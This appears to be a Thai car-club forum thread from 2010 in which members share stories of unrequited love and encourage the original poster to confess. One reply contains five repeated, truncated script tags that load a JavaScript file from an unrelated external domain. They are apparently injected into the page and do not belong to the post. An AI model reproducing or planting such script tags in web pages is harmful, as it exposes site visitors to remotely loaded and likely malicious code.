ตอบ
wanwisa

ชื่อเล่น: กาป๋องแป้ง

เข้าร่วม: 20 ธันวา 2010
ตอบ: 179

มือใหม่หัดขับ

ได้รับคำขอบคุณ: 250
ให้คำขอบคุณ: 22
อาทิตย์, 26 ธันวา 2010 00:09 - เคยไม๊กับการแอบรักใครซักคน.
คุณเคยแอบรักใครสักคนไหมคะ

คุณเคยไหม... กับการที่ได้แต่แอบรัก แอบฝันอยู่ข้างเดียว

เก็บงำเอาไว้จนสายเกินไป

และเมื่อโอกาสผ่านเลย

เราก็ได้แต่เก็บความรู้สึกเอาไว้ที่หัวใจตลอดกาล

รักครั้งแรกของฉันเป็นเช่นนั้น

และมันยังทำให้ฉันนึกเสียใจอยู่จนถึงวันนี้

ยังจำได้ถึงเสียงหัวใจของตัวเองที่เต้นไม่เป็นจังหวะ

ยามได้แอบเฝ้ามอง หรือเพียงแค่เค้าเดินเฉียดมาใกล้

ยังจำได้ถึงความเศร้าเมื่อรู้ว่าคงไม่มีโอกาสได้พบกันอีก

ฉันปล่อยทุกอย่างไปแล้วอย่างน่าเสียดาย

หากว่าตอนนั้นฉันได้พูดมันออกไป

ไม่ว่าบทสรุปจะเป็นเช่นไร

อย่างน้อยฉันก็ได้รู้ว่า...ความรักของฉันจะไม่ตายไปพร้อมกับฉันอย่างเงียบ ๆ

แต่มันได้มีโอกาสแสดงตัวอย่างอาจหาญแล้ว

หากแต่ว่าคุณกำลังจะปล่อยให้โอกาสของคุณหลุดลอยไป...

ได้โปรดคิดทบทวนอีกครั้ง

ให้ความรักที่เติบโตในใจของคุณ

ได้งอกงามต่อในหัวใจของคนที่คุณรักเถิด

ไม่ว่าเขาจะต้องการหรือไม่

อย่างน้อยเขาก็ได้รับรู้ถึงความรู้สึกคุณ

(แต่ทุกวันนี้เค้าก้อมีความสุขดี (ฉันก้อดีใจที่รู้ว่าเค้ามีความสุข ถึงแม้ความสุขที่เขามีอยู่นั้น ไม่ได้มีฉันเป็นองค์ประกอบเลยก็ตาม...)
Zmart

ชื่อเล่น: มารถ

เข้าร่วม: 05 กันยา 2010
ตอบ: 83

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 143
ให้คำขอบคุณ: 104

ปี: 2005
สี: ขาว ทาฟเฟต้า (NH-578)
อาทิตย์, 26 ธันวา 2010 00:13 - เคยไม๊กับการแอบรักใครซักคน.
เคยครับ ตอนนี้ก็เป็นอยู่
ได้รับคำขอบคุณจาก: Nut_Au_Together  benzd  brunox  hacker 
wanwisa

อาทิตย์, 26 ธันวา 2010 00:16 - เคยไม๊กับการแอบรักใครซักคน.
Zmart พิมพ์ว่า:
เคยครับ ตอนนี้ก็เป็นอยู่

อ่าน๊ะ มันยิงทรมารน๊ะค๊ะ เมื่อรู้ว่าเค้ามีแฟนแล้ว
ได้รับคำขอบคุณจาก: Nut_Au_Together  benzd  brunox  hacker 
Gremlin

ชื่อเล่น: ออมสิน

เข้าร่วม: 18 ตุลา 2010
ตอบ: 235

มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 416
ให้คำขอบคุณ: 1624

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 26 ธันวา 2010 00:54 - เคยไม๊กับการแอบรักใครซักคน.
เคยค่ะ... นานถึง 5 ปีทีเดียว...

คบกันแบบที่ไม่รู้ว่าอยู่ในฐานะอะไร จะเรียกว่าแอบรักรึเปล่า... ??

เค้าเองก็แสดงออกเหมือนเราเป็นเพื่อน แต่บางทีก็เหมือนมากกว่าเพื่อน ... คอยเป็นห่วงเราตลอด

พอกลั้นใจถามว่าเค้ารู้สึกยังไง ... เค้าก็บอกว่าเค้าเห็นเราเป็นน้องคนนึงที่รู้สึกดี ๆ ด้วย แต่ไม่ได้คิดอะไรมากกว่านั้น..
(ก็เจ็บสิ... ) แต่จะให้บอกออกไปได้ยังไงว่าเราคิดกับเค้ามากกว่านั้น...

มันเป็นความทรมานที่ยาวนานมาก....

สุดท้ายหลังจากที่เราตัดสินใจเดินออกจากชีวิตเค้ามา...

2 ปีหลังจากนั้น..เค้ากลับมา... กลับมาเพื่อสารภาพว่าเค้าเองก็แอบรักเราอยู่เหมือนกัน พยายามพร่ำพรรณนาสิ่งต่างๆ ว่าเมื่อขาดเรา เค้ารู้สึกแย่แค่ไหน และบอกกับเราว่า.. ตอนนี้พี่พร้อมแล้วที่จะมีใครซักคน และ...ขอเราแต่งงาน....

แต่ ณ วันที่เค้ากลับมา เราก็มีคนที่อยู่เคียงข้างเราแล้ว...

มันจึงเป็นไปไม่ได้ที่เราจะทำร้ายผู้ชายคนนึงที่เค้าไม่ได้ทำผิดอะไร
เพื่อกลับไปหาผู้ชายคนที่ก่อนหน้านั้นไม่เคยแยแสกับความรู้สึกเราเลย และปล่อยให้เราหายไปจากชีวิตเค้านานถึง 2 ปี

ณ ปัจจุบัน.. เค้าก็มีแฟนไปแล้ว...

(เหมือนละครน้ำเน่า... แต่เป็นเรื่องจริง)

อยากบอกคุณ "กาป๋องแป๋ง" ว่า... ถ้าคุณรู้สึกรักใคร... จงบอกให้เค้ารับรู้เถอะค่ะ
เพราะคนเรา..ไม่มีโอกาสได้รู้หรอกว่า เราจะอยู่บนโลกนี้อีกนานแค่ไหน
และโลกนี้จะพาให้ชีวิตเราหมุนไปพบเจอกับใคร... ในวันข้างหน้า

แต่แค่วันนี้... คุณซื่อสัตย์กับความรู้สึกของตัวเอง คิดอะไรก็จงบอกเค้าไปอย่างที่ใจคุณคิด...
น่าจะเป็นทางเลือกที่ดีที่สุดนะคะ..

อย่างน้อยคุณจะได้ไม่ต้องเสียเวลาคาดเดาและรอ...รอ...รอ...ต่อไปอย่างไร้จุดหมาย

บางที.... ชีวิตคุณอาจจะได้เจอ"ใคร"ที่เค้าสามารถทำให้คุณรักเค้าได้มากกว่าผู้ชายคนปัจจุบันที่คุณแอบรักอยู่ก็ได้...

ที่สำคัญ... คนเราถ้าเป็นคู่กันแล้ว.. ยังไงก็ไม่แคล้วกันค่ะ..

แต่ถ้าเรากับเค้าไม่ใช่คู่กัน
ต่อให้เราพยายามกับเค้ามากเท่าไหร่ มันก็ไม่มีทางจะเป็นไปได้...

เป็นกำลังใจให้นะคะ ....
ได้รับคำขอบคุณจาก: cisco  curran  kittidech  pandaman  benzd  aun99  Jeab22  brunox  okuma  dogtown  coromant  wut-chiangmai  klaoies  book05  max_x  TUI_PeTiTe  kim_possible  yoosabai  musashi44  aeae..  teerayod  DEAR ES 02  modality  Msnman  hacker 
Gremlin

ชื่อเล่น: ออมสิน

เข้าร่วม: 18 ตุลา 2010
ตอบ: 235

ได้รับคำขอบคุณ: 416
ให้คำขอบคุณ: 1624

สี: เงิน ซาติน (เมทัลลิก) (NH-623M)
อาทิตย์, 26 ธันวา 2010 00:57 - เคยไม๊กับการแอบรักใครซักคน.
แต่ถ้า ณ ตอนนี้เค้ามีแฟนแล้ว...

ก็... อยากให้คุณลองเปิดใจ... มองดูคนอื่นๆ นะคะ

เพราะมันคงเป็นเรื่องที่เป็นไปได้ยาก... ถ้าจะรอให้เค้าเลิกกับแฟนเค้าแล้วหันมาหาคุณ...

ไม่จำเป็นต้องเลิกรัก... เพียงแต่ปรับเปลี่ยนความรักกันฉันท์ชู้สาว ให้เป็นความรักในแบบของเพื่อนที่พร้อมจะหยิบยื่นความหวังดีให้กับเค้าดีกว่า ... ถ้าคุณทำได้ คุณคงมีความสุขมากขึ้นอีกเยอะเลย...

สู้ๆ ค่ะ
ได้รับคำขอบคุณจาก: cisco  wanwisa  curran  kittidech  benzd  Jeab22  brunox  aun99  coromant  harry5  book05  TUI_PeTiTe  kim_possible  yoosabai  musashi44  pandaman  hacker 
cisco

ชื่อเล่น: เต้น

เข้าร่วม: 25 พฤศจิกา 2008
ตอบ: 3557

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 5197
ให้คำขอบคุณ: 9940
อาทิตย์, 26 ธันวา 2010 01:03 - เคยไม๊กับการแอบรักใครซักคน.
สิ่งเล็ก ๆ ที่เรียกว่า "รัก"

แก้ไขล่าสุดโดย เมื่อ อาทิตย์, 26 ธันวา 2010 08:44, ทั้งหมด 1 ครั้ง (ดูทั้งหมด)
ได้รับคำขอบคุณจาก: benzd  brunox  hacker 
wanwisa

อาทิตย์, 26 ธันวา 2010 01:18 - เคยไม๊กับการแอบรักใครซักคน.
Gremlin พิมพ์ว่า:
แต่ถ้า ณ ตอนนี้เค้ามีแฟนแล้ว...

ก็... อยากให้คุณลองเปิดใจ... มองดูคนอื่นๆ นะคะ

เพราะมันคงเป็นเรื่องที่เป็นไปได้ยาก... ถ้าจะรอให้เค้าเลิกกับแฟนเค้าแล้วหันมาหาคุณ...

ไม่จำเป็นต้องเลิกรัก... เพียงแต่ปรับเปลี่ยนความรักกันฉันท์ชู้สาว ให้เป็นความรักในแบบของเพื่อนที่พร้อมจะหยิบยื่นความหวังดีให้กับเค้าดีกว่า ... ถ้าคุณทำได้ คุณคงมีความสุขมากขึ้นอีกเยอะเลย...

สู้ๆ ค่ะ

-ขอบคุณมากมายคร้า
ได้รับคำขอบคุณจาก: Gremlin  benzd  brunox  kim_possible  hacker 
nutto2634

ชื่อเล่น: นัท

เข้าร่วม: 21 กันยา 2010
ตอบ: 233

ได้รับคำขอบคุณ: 383
ให้คำขอบคุณ: 113

ปี: 2003
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 26 ธันวา 2010 01:25 - เคยไม๊กับการแอบรักใครซักคน.
ตอนนี้ผมก็แอบรักคนๆนึงอยู่ มันก็เจ็บแปล๊บๆนะครับ ทรมานดี แต่ไม่กล้าบอกเค้าอ่ะครับ เพราะเค้าเป็นเพื่อนสนิทกับผม

เฮ้อ!!!!
ได้รับคำขอบคุณจาก: benzd  brunox  Gremlin  hacker 
wanwisa

อาทิตย์, 26 ธันวา 2010 01:27 - เคยไม๊กับการแอบรักใครซักคน.
nutto2634 พิมพ์ว่า:
ตอนนี้ผมก็แอบรักคนๆนึงอยู่ มันก็เจ็บแปล๊บๆนะครับ ทรมานดี แต่ไม่กล้าบอกเค้าอ่ะครับ เพราะเค้าเป็นเพื่อนสนิทกับผม

เฮ้อ!!!!

เข้าใจถึงความรู้สึกนี้ค๊ะ เพราะก้อคงตกอยู่ในสถานะเดียวกัน เห้อ (มันยากที่จะอธิบาย)
ได้รับคำขอบคุณจาก: benzd  brunox  nutto2634  hacker 
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

อาทิตย์, 26 ธันวา 2010 08:28 - เคยไม๊กับการแอบรักใครซักคน.
Gremlin พิมพ์ว่า:

+ไปเลยครับ โดนใจสุดๆ
ได้รับคำขอบคุณจาก: brunox  Gremlin  nutto2634  hacker 
Concept_ES

เข้าร่วม: 09 มีนา 2010
ตอบ: 287

ได้รับคำขอบคุณ: 609
ให้คำขอบคุณ: 1075

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 26 ธันวา 2010 08:34 - เคยไม๊กับการแอบรักใครซักคน.
สิ่งเล็กเล็กที่เรียกว่ารัก
ได้รับคำขอบคุณจาก: brunox  nutto2634  hacker 
Favonius

ชื่อเล่น: ซี

เข้าร่วม: 15 มิถุนา 2010
ตอบ: 782

ผู้ชนะเลิศการแข่งขัน ES Drag war 2011
ผู้ชนะเลิศการแข่งขัน ES Drag war 2011

ได้รับคำขอบคุณ: 626
ให้คำขอบคุณ: 2436

อาทิตย์, 26 ธันวา 2010 08:40 - เคยไม๊กับการแอบรักใครซักคน.
เคยครับ แต่ตอนนี้ได้มาเป็นแฟนแล้วครับ

ทำอะไรได้ก็รีบทำนะครับ ก่อนมันจะสายเกินไป
ได้รับคำขอบคุณจาก: cisco  brunox  Gremlin  nutto2634  hacker 
wutdy

ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

ปี: 2001
อาทิตย์, 26 ธันวา 2010 09:13 - เคยไม๊กับการแอบรักใครซักคน.
เคยครับ ณ ปัจจุบันนี่เลย

เคยปล่อยเวลาให้ผ่านไป แต่ต่อไปจะไม่อีกแล้ว

เพราะจากการที่ปล่อยเวลาให้ผ่านไปเกือบ 6 ปี มันทำให้รู้สึกเสียใจจนถึงวันนี้เลย

จากที่เอาแต่ถอยตอนนี้ต้องรู้จักเดินหน้าแล้วล่ะครับ เพราะอีกไม่นานจะเป็นโอกาสที่ได้เจอกัน

ก่อนที่จะสายเกินไปแล้วรู้สึกเสียใจไปตลอด
ได้รับคำขอบคุณจาก: brunox  Gremlin  nutto2634  book05  hacker 
brunox

ชื่อเล่น: โอ

เข้าร่วม: 03 ธันวา 2009
ตอบ: 811

Guru ES
Guru ES

ได้รับคำขอบคุณ: 938
ให้คำขอบคุณ: 3182

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อาทิตย์, 26 ธันวา 2010 09:25 - เคยไม๊กับการแอบรักใครซักคน.

สู้ๆคร้าบทุกคน..
ได้รับคำขอบคุณจาก: hacker 
wanwisa

อาทิตย์, 26 ธันวา 2010 10:00 - เคยไม๊กับการแอบรักใครซักคน.
wutdy พิมพ์ว่า:

เคยปล่อยเวลาให้ผ่านไป แต่ต่อไปจะไม่อีกแล้ว

เพราะจากการที่ปล่อยเวลาให้ผ่านไปเกือบ 6 ปี มันทำให้รู้สึกเสียใจจนถึงวันนี้เลย

จากที่เอาแต่ถอยตอนนี้ต้องรู้จักเดินหน้าแล้วล่ะครับ เพราะอีกไม่นานจะเป็นโอกาสที่ได้เจอกัน

ก่อนที่จะสายเกินไปแล้วรู้สึกเสียใจไปตลอด

เหมือนกันเลยค๊ะ wutdy แต่ตอนของแป้งมันผ่านไป เกือบ9ปีแล้ว

แต่ตอนนี้ก้อดีใจน๊ะค๊ะ ที่ได้พูดคุยกับเค้า แต่ก้อไม่กล้าบอกสักทีค๊ะ

(แอบกลัวเค้ารู้เหมือนกัน เพราะเค้าก้อเปณสมาชิกคลับนี้เหมือนกัน เหอะๆ)
wanwisa

อาทิตย์, 26 ธันวา 2010 10:02 - เคยไม๊กับการแอบรักใครซักคน.
brunox พิมพ์ว่า:

สู้ๆคร้าบทุกคน..

คร้า
จะรวบรวมความกล้าให้ได้
ผู้ใหญ่บ้าน

เข้าร่วม: 17 กุมภา 2009
ตอบ: 1174

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1071
ให้คำขอบคุณ: 719
อาทิตย์, 26 ธันวา 2010 10:42 - เคยไม๊กับการแอบรักใครซักคน.
ตอนนี้ แอบหลงรักเจ้าของกระทู้ และ
อิอิอิ
benzd

ชื่อเล่น: เบนซ์

เข้าร่วม: 11 มกรา 2009
ตอบ: 3402

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 3986
ให้คำขอบคุณ: 3164

อาทิตย์, 26 ธันวา 2010 10:47 - เคยไม๊กับการแอบรักใครซักคน.
wanwisa พิมพ์ว่า:

เหมือนกันเลยค๊ะ wutdy แต่ตอนของแป้งมันผ่านไป เกือบ9ปีแล้ว

แต่ตอนนี้ก้อดีใจน๊ะค๊ะ ที่ได้พูดคุยกับเค้า แต่ก้อไม่กล้าบอกสักทีค๊ะ

(แอบกลัวเค้ารู้เหมือนกัน เพราะเค้าก้อเปณสมาชิกคลับนี้เหมือนกัน เหอะๆ)
พยายามเข้านะครับ ถ้าเขาเป็นคนที่ใช่ก็บอกเลยครับ
wanwisa

อาทิตย์, 26 ธันวา 2010 10:52 - เคยไม๊กับการแอบรักใครซักคน.
ed_36 พิมพ์ว่า:
ตอนนี้ แอบหลงรักเจ้าของกระทู้ และ
อิอิอิ

:o

:)
:D
wanwisa

อาทิตย์, 26 ธันวา 2010 10:53 - เคยไม๊กับการแอบรักใครซักคน.
benzd พิมพ์ว่า:

พยายามเข้านะครับ ถ้าเขาเป็นคนที่ใช่ก็บอกเลยครับ

ขอบคุณมากมายคร้า
Doraeman

เข้าร่วม: 12 ตุลา 2009
ตอบ: 209

ได้รับคำขอบคุณ: 277
ให้คำขอบคุณ: 2583

สี: ทอง ไทเทเนียม (เมทัลลิก) (YR-525M)
อาทิตย์, 26 ธันวา 2010 11:01 - เคยไม๊กับการแอบรักใครซักคน.

คุณเคยไหม... กับการที่ได้แต่แอบรัก แอบฝันอยู่ข้างเดียว

เราก็ได้แต่เก็บความรู้สึกเอาไว้ที่หัวใจตลอดกาล

และมันยังทำให้ฉันนึกเสียใจอยู่จนถึงวันนี้

ยังจำได้ถึงเสียงหัวใจของตัวเองที่เต้นไม่เป็นจังหวะ

ยามได้แอบเฝ้ามอง หรือเพียงแค่เค้าเดินเฉียดมาใกล้

ยังจำได้ถึงความเศร้าเมื่อรู้ว่าคงไม่มีโอกาสได้พบกันอีก

ฉันปล่อยทุกอย่างไปแล้วอย่างน่าเสียดาย

หากว่าตอนนั้นฉันได้พูดมันออกไป

อย่างน้อยฉันก็ได้รู้ว่า...ความรักของฉันจะไม่ตายไปพร้อมกับฉันอย่างเงียบ ๆ

แต่มันได้มีโอกาสแสดงตัวอย่างอาจหาญแล้ว

หากแต่ว่าคุณกำลังจะปล่อยให้โอกาสของคุณหลุดลอยไป...

ได้งอกงามต่อในหัวใจของคนที่คุณรักเถิด

อย่างน้อยเขาก็ได้รับรู้ถึงความรู้สึกคุณ

(แต่ทุกวันนี้เค้าก้อมีความสุขดี (ฉันก้อดีใจที่รู้ว่าเค้ามีความสุข ถึงแม้ความสุขที่เขามีอยู่นั้น ไม่ได้มีฉันเป็นองค์ประกอบเลยก็ตาม...)

โดนใจจังเลย ขอให้ Thanks นะครับ
wanwisa

อาทิตย์, 26 ธันวา 2010 11:09 - เคยไม๊กับการแอบรักใครซักคน.
Doraeman พิมพ์ว่า:

โดนใจจังเลย ขอให้ Thanks นะครับ

ขอบคุณคร้า
Gof

ชื่อเล่น: ก๊อฟ

เข้าร่วม: 08 พฤศจิกา 2010
ตอบ: 73

สมาชิกสับสน
สมาชิกสับสน

ได้รับคำขอบคุณ: 70
ให้คำขอบคุณ: 122

ปี: 2004
อาทิตย์, 26 ธันวา 2010 11:13 - เคยไม๊กับการแอบรักใครซักคน.
ไม่มีอะไรจะแนะนำ แต่เคยได้ยินคำนี้มั๊ย
"จีบคนโสด คู่แข่งมีเป็นแสน
จีบคนมีแฟน คู่แข่งมีคนเดียว"
ถ้ายังคิดไรไม่ออก หลังไมค์ได้..(ล้อเล่น)
เป็นกำลังใจหั๊ย คืบหน้าไงบอกด้วย..
ได้รับคำขอบคุณจาก: aun99  hacker 
dogtown

ชื่อเล่น: อัดขัดลำ

เข้าร่วม: 01 ธันวา 2008
ตอบ: 1114

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 2018
ให้คำขอบคุณ: 416

อาทิตย์, 26 ธันวา 2010 11:22 - เคยไม๊กับการแอบรักใครซักคน.
เมื่อประมาณ 2 ปีที่แล้วเคยเจอประสบการณ์ตรง แอบปลื้มมากสาวอยู่คนนึงซึ่งรู้สึกว่าความต่างมีมากมาย (เป็นhiso)
เค้านิสัยดีจนห้ามใจไม่ไหว แต่สุดท้ายผมก็ดันตัวเองออกมาจากความรู้สึกนั้น พอเวลานั้นผ่านไปก็รับรู้ได้เลยว่า ความเป้นเพื่อนมันรู้สึกดีกว่าเยอะมากมาย ดีกว่าไปทรมาณคิดไปฝ่ายเดียว

ทุกวันนี้ก็พยายามไม่คิดแบบนี้กับใคร อยู่คนเดียวดีที่สุด
ได้รับคำขอบคุณจาก: Gremlin  musashi44  hacker 
wanwisa

อาทิตย์, 26 ธันวา 2010 12:48 - เคยไม๊กับการแอบรักใครซักคน.
Gof พิมพ์ว่า:
ไม่มีอะไรจะแนะนำ แต่เคยได้ยินคำนี้มั๊ย
"จีบคนโสด คู่แข่งมีเป็นแสน
จีบคนมีแฟน คู่แข่งมีคนเดียว"
ถ้ายังคิดไรไม่ออก หลังไมค์ได้..(ล้อเล่น)
เป็นกำลังใจหั๊ย คืบหน้าไงบอกด้วย..

-ขอบคุณสำหรับกำลังใจน๊ะค๊ะ ^_^
wanwisa

อาทิตย์, 26 ธันวา 2010 12:54 - เคยไม๊กับการแอบรักใครซักคน.
dogtown พิมพ์ว่า:
เมื่อประมาณ 2 ปีที่แล้วเคยเจอประสบการณ์ตรง แอบปลื้มมากสาวอยู่คนนึงซึ่งรู้สึกว่าความต่างมีมากมาย (เป็นhiso)
เค้านิสัยดีจนห้ามใจไม่ไหว แต่สุดท้ายผมก็ดันตัวเองออกมาจากความรู้สึกนั้น พอเวลานั้นผ่านไปก็รับรู้ได้เลยว่า ความเป้นเพื่อนมันรู้สึกดีกว่าเยอะมากมาย ดีกว่าไปทรมาณคิดไปฝ่ายเดียว

ทุกวันนี้ก็พยายามไม่คิดแบบนี้กับใคร อยู่คนเดียวดีที่สุด

-อยู่คนเดียวก็ดีเหมือนกัน ไม่เปลืองงหัวใจ อาจจะมีแค่เหงา เหงาบ่อยๆก้อคุ้นกันไป-

แต่สำหรับแป้งแล้ว เมื่อคิดที่จะมีความรัก ก้อต้องพร้อมที่จะพบกับความเจ็บปวด เพราะมันย่อมมาพร้อมกันเสมอ

แต่ความกล้านี่สิค่ะ ถ้ากล้าพูดออกไป คงไม่ปล่อยให้ผ่านกว่า9ปี -_-" แย่จังเลย
ได้รับคำขอบคุณจาก: Gremlin  hacker 
civic753

ชื่อเล่น: ชาติ

เข้าร่วม: 11 พฤศจิกา 2009
ตอบ: 1301

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 1304
ให้คำขอบคุณ: 2395

อาทิตย์, 26 ธันวา 2010 14:48 - เคยไม๊กับการแอบรักใครซักคน.
เนื้อคู่กันแล้วก็คงไม่คลาด <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></
ได้รับคำขอบคุณจาก: Gremlin  hacker 
Fil-reD

ชื่อเล่น: ฟลุ๊ค

เข้าร่วม: 04 ตุลา 2009
ตอบ: 985

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 757
ให้คำขอบคุณ: 597

อาทิตย์, 26 ธันวา 2010 20:45 - เคยไม๊กับการแอบรักใครซักคน.
เคยครับ แต่ตอนนี้ไม่เก็บความรู้สึกไว้กับตัวแล้วครับ กลัวคำตอบแต่ก็ทำแล้วครับ ให้เขาได้รู้ดีกว่าครับ
kittidech

ชื่อเล่น: กิต คร้าบ

เข้าร่วม: 06 กรกฎา 2009
ตอบ: 2334

Moderator
Moderator

ได้รับคำขอบคุณ: 2835
ให้คำขอบคุณ: 15110

อาทิตย์, 26 ธันวา 2010 21:55 - เคยไม๊กับการแอบรักใครซักคน.
สู้สู้ค้าบ ผมว่าส่วนใหญ่น่าจะมีประสบการณ์แบบนี้นะครับ
wutdy

ชื่อเล่น: วูดดี้

เข้าร่วม: 13 มกรา 2010
ตอบ: 895

Guru ES
Guru ES

ได้รับคำขอบคุณ: 1250
ให้คำขอบคุณ: 235

อาทิตย์, 26 ธันวา 2010 22:19 - เคยไม๊กับการแอบรักใครซักคน.
อยู่คนเดียวก็เหมือนจะดี แต่ถ้าคิดอีกทีก็เหงานะครับผม

ใจก็อยากบอกแต่ปากแข็ง จะทำไงดีล่ะ

กลัวว่าถ้าบอกไปแล้วจากเพื่อนสนิท จะไม่เหลืออะไรเลย (ตามสูตรละครเลยขีวิตผม -*-)
ตอบ
หน้า 1 จาก 3
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2024 Civic ES Group. All rights reserved.